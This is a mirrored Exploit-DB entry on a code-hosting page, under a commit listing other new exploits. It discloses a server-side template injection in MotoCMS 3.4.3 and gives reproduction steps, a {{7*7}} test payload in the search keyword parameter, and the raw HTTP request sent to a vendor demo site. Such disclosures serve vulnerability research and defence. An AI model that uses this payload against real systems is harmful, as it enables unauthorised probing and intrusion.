bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/multiple/webapps/51499.txt
Exploit-DB cb5c64da21 DB: 2023-06-01 
13 changes to exploits/shellcodes/ghdb

Pydio Cells 4.1.2 - Cross-Site Scripting (XSS) via File Download
Pydio Cells 4.1.2 - Server-Side Request Forgery
Pydio Cells 4.1.2 - Unauthorised Role Assignments

Flexense HTTP Server 10.6.24 - Buffer Overflow (DoS) (Metasploit)

MotoCMS Version 3.4.3 - Server-Side Template Injection (SSTI)

Faculty Evaluation System 1.0 - Unauthenticated File Upload

Online Security Guards Hiring System 1.0 - Reflected XSS

Online shopping system advanced 1.0 - Multiple Vulnerabilities

Rukovoditel 3.3.1 - CSV injection

SCRMS 2023-05-27 1.0 - Multiple SQL Injection

Service Provider Management System v1.0 - SQL Injection

Ulicms-2023.1-sniffing-vicuna - Privilege escalation

unilogies/bumsys v1.0.3 beta - Unrestricted File Upload
2023-06-01 00:16:25 +00:00

38 lines
No EOL
1.4 KiB
Text
Raw Permalink Blame History

# Title: MotoCMS Version 3.4.3 - Server-Side Template Injection (SSTI)
# Author: tmrswrr
# Date: 31/05/2023
# Vendor: https://www.motocms.com
# Link: https://www.motocms.com/website-templates/demo/189526.html
# Vulnerable Version(s): MotoCMS 3.0.27
## Description
MotoCMS Version 3.4.3 Store Category Template was discovered to contain a Server-Side Template
Injection (SSTI) vulnerability via the keyword parameter.
## Steps to Reproduce
1. Open the target URL: https://template189526.motopreview.com/
2. Write payload here : https://template189526.motopreview.com/store/category/search/?page=1&limit=36&keyword={{7*7}}
3. You will be see result is 49
Vuln Url : https://template189526.motopreview.com/store/category/search/?page=1&limit=36&keyword={{7*7}}
GET /store/category/search/?page=&limit=&keyword={{7*7}} HTTP/1.1
Host: template189526.motopreview.com
Cookie: PHPSESSID=7c0qgdvsehaf1a2do6s0bcl4p0; 9b7029e0bd3be0d41ebefd47d9f5ae46_session-started=1685536759239
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Dnt: 1
Referer: https://template189526.motopreview.com/store/category/search/?keyword=%7B%7B3*3%7D%7D
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
Reference in a new issue View git blame Copy permalink